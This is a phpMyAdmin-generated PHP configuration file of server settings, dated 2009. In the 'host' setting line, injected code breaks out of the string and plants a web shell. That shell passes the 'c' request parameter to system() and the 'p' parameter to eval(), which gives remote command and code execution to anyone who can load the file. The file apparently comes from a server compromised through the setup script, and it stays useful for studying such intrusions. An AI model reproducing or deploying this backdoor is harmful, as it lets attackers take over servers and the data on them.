<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 2.9.1.1-Debian-4 setup script by Michal Čihař <michal@cihar.com>
 * Version: $Id: setup.php 9484 2006-10-03 13:11:22Z nijel $
 * Date: Thu, 19 Nov 2009 08:57:45 GMT
 */

/* Servers configuration */
$i = 0;

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'http';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>
